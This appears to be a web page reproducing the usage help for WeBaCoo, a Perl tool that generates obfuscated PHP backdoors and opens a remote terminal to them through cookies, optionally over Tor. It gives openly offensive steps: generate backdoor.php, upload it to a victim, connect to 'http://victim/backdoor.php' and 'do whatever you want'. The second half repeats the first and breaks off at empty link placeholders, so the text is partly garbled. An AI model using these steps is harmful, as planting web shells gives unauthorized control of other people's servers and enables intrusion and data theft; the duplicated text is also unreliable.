Usage: webacoo.pl [options]
Options:
-g Generate backdoor code (-o is required)
-f FUNCTION PHP System function to use
FUNCTION:
1: system (default)
2: shell_exec
3: exec
4: passthru
5: popen
-o OUTPUT Generated backdoor output filename
-r Return un-obfuscated backdoor code
-t Establish remote "terminal" connection (-u is required)
-u URL Backdoor URL
-c C_NAME Cookie name (default: "M-cookie")
-d DELIM Delimiter (default: New random for each request)
-a AGENT HTTP header user-agent (default exist)
-p PROXY Use proxy (tor, ip:port or user:pass:ip:port)
-v LEVEL Verbose level
LEVEL:
0: no additional info (default)
1: print HTTP headers
2: print HTTP headers + data
-h Display help and exit
update Check for updates and apply if any
1. Generate php backdoor file
- ./webacoo.pl -g -o backdoor.php
2. Upload backdoor to victim
3. Use WeBaCoo connect to backdoor
- ./webacoo.pl -t -u http://victim/backdoor.php
4. Now you are in the victim console, do whatever you want :)
VIDEO TUTORIAL:
here
DOWNLOAD LINK:
1: print HTTP headers
2: print HTTP headers + data
-h Display help and exit
update Check for updates and apply if any
1. Generate php backdoor file
- ./webacoo.pl -g -o backdoor.php
2. Upload backdoor to victim
3. Use WeBaCoo connect to backdoor
- ./webacoo.pl -t -u http://victim/backdoor.php
4. Now you are in the victim console, do whatever you want :)
VIDEO TUTORIAL: